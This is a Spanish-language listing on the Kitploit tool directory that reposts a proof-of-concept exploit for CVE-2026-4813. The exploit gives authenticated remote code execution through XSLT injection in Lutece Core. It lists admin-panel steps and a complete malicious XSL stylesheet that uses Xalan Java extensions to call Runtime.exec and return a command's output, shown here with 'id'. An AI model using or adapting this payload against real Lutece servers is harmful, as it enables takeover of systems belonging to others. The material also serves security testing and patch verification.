Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-4813 — Prueba de concepto de explotación para ejecución remota de código autenticada mediante inyección XSLT en Lutece Core, que demuestra la ejecución de comandos a través de hojas de estilo XSL manipuladas. | Kitploit
Herramientas/GitHubGitHub/trachinus/cve-2026-4813
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtrachinus/cve-2026-4813

CVE-2026-4813

Prueba de concepto de explotación para ejecución remota de código autenticada mediante inyección XSLT en Lutece Core, que demuestra la ejecución de comandos a través de hojas de estilo XSL manipuladas.

Ver Repositorio
hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-4813 (CVSS-B 9.4 CRÍTICO)

RCE autenticado mediante inyección XSLT en Lutece Core <= 7.1.7

Explicaciones y más en mi sitio web <

PoC

Necesitas una cuenta con privilegios de administrador.

  1. En el panel de administración, navega a la página de gestión de exportación XSL: /jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport

  2. Haz clic en "Añadir una nueva hoja de transformación".

  3. Sube un archivo .xsl con el payload (comando id simple):

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
    xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
    xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
    
    <xsl:template match="/">
        <xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
        <xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
        
        <xsl:variable name="reader" select="is:new($inputStream)"/>
        <xsl:variable name="buffereReader" select="br:new($reader)"/>
        <xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
        
        <Output>
            <xsl:value-of select="$resultat"/>
        </Output>
    </xsl:template>
</xsl:stylesheet>
  1. Guarda la nueva hoja XSL.

  2. Navega a la página de exportación de usuarios: /jsp/admin/user/ExportUsers.jsp

  3. Selecciona la hoja de transformación que acabamos de crear y valida.

  4. El resultado del comando id debería estar en el archivo exportado.

Descargar herramienta